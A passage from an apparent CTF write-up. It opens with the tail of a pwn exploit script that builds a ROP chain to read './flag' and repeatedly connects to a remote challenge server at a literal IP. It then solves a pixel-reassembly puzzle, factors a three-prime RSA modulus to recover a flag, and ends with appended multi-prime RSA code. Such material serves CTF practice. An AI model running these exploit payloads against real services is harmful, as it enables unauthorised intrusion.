	rop+= p64(rsi)+p64(f_hook&0xfffffffffffff000+0x100)
	rop+= p64(rdx)+p64(0x30)+p64(dread)
	rop+= p64(rdi)+p64(1)
	rop+= p64(rsi)+p64(f_hook&0xfffffffffffff000+0x100)
	rop+= p64(rdx)+p64(0x30)+p64(dwrite)
	rop+= './flag\x00\x00'
	# gdb.attach(p,'b *'+str(rdi))
	sl('jiaraniloveyou~\x00'+rop)

while 1:
	try:
		# p = process('./pwn')
		p = remote('47.242.20.238','7777')
		elf = ELF('./pwn')
		libc = elf.libc
		pwn()
		break
	except:
		p.close()

shell()

MISC

Have you been broken today

The attachment is row after row of hex values that look like pixel data.

The following script reassembles them into a 1080 * 1080 image:

# Replace the spaces in the attachment with commas beforehand (saved as ans.txt)

from PIL import Image

img = Image.new('RGB', (1080, 1080))
filetxt = open('ans.txt', 'r').read()
filetxt = filetxt.replace('\n', ',')
filetxt = filetxt.split(',')            # 3499200 values = 1080 * 1080 * 3
hexlist = [int(i, 16) for i in filetxt]
pixellist = [hexlist[i:i + 3] for i in range(0, 3499200, 3)]   # one (R, G, B) triple per pixel
num = 0
for x in range(0, 1080):
    for y in range(0, 1080):
        img.putpixel((x, y), tuple(pixellist[num]))
        num = num + 1
img.show()
img.save('rea.png')

This gives a scrambled image.

Solve it as a jigsaw with the gaps puzzle solver:

gaps --image=rea.png --generations=50 --population=729 --size=40 --save

Crypto

Three is OK

n is the product of three primes p, q and r. Because they are very close, n can be factored directly with the online service

http://www.factordb.com/

After factoring n, decrypt directly:

import gmpy2
import binascii

p = 821285845529489288911031313917
q = 967244547191154261539598250343
r = 1005682191548299165290460437397
e = 65537
c = 249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575
n = p*q*r

phi = (p-1)*(q-1)*(r-1)      # Euler's totient for a three-prime modulus
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(m)
print(binascii.unhexlify(hex(m)[2:].strip("L")))   # strip("L") only matters for Python 2 longs
b'SYC{now_you_solve_it}'
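As an added example (not the write-up's script), multi-prime RSA decryption generalised to any number of primes, both with the single exponent d computed above and per-prime via the Chinese Remainder Theorem; the small primes used in the round-trip check are my own constructed key, and the write-up's numbers are included only as a demo input.

```python
from functools import reduce

def product(values):
    return reduce(lambda acc, v: acc * v, values, 1)

def multi_prime_private_exponent(e, primes):
    """d = e^-1 mod phi(n) with phi(n) = prod (p_i - 1), as the write-up computes it.
    pow() raises ValueError when gcd(e, phi) != 1, i.e. e is not a valid exponent."""
    phi = product(p - 1 for p in primes)
    return pow(e, -1, phi)

def encrypt(m, e, primes):
    return pow(m, e, product(primes))

def decrypt_plain(c, e, primes):
    """One exponentiation modulo the full n, exactly like the script above."""
    return pow(c, multi_prime_private_exponent(e, primes), product(primes))

def crt_combine(residues, moduli):
    """Incremental CRT for pairwise coprime moduli: returns x with x = r_i (mod m_i)."""
    x, m = 0, 1
    for r, mod in zip(residues, moduli):
        t = ((r - x) * pow(m, -1, mod)) % mod
        x += m * t
        m *= mod
    return x

def decrypt_crt(c, e, primes):
    """Why multi-prime RSA is used in practice: reduce the exponent mod (p_i - 1),
    decrypt modulo each small prime separately, then recombine with the CRT."""
    d = multi_prime_private_exponent(e, primes)
    residues = [pow(c % p, d % (p - 1), p) for p in primes]
    return crt_combine(residues, primes)

def int_to_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

# The write-up's numbers, as a demo input only.
PAGE_PRIMES = [821285845529489288911031313917,
               967244547191154261539598250343,
               1005682191548299165290460437397]
PAGE_E = 65537
PAGE_C = 249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575

def decrypt_page_ciphertext():
    return int_to_bytes(decrypt_crt(PAGE_C, PAGE_E, PAGE_PRIMES))
```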

Tags: CTF pwn

Posted on Sat, 20 Nov 2021 05:37:23 -0500 by nrg_alpha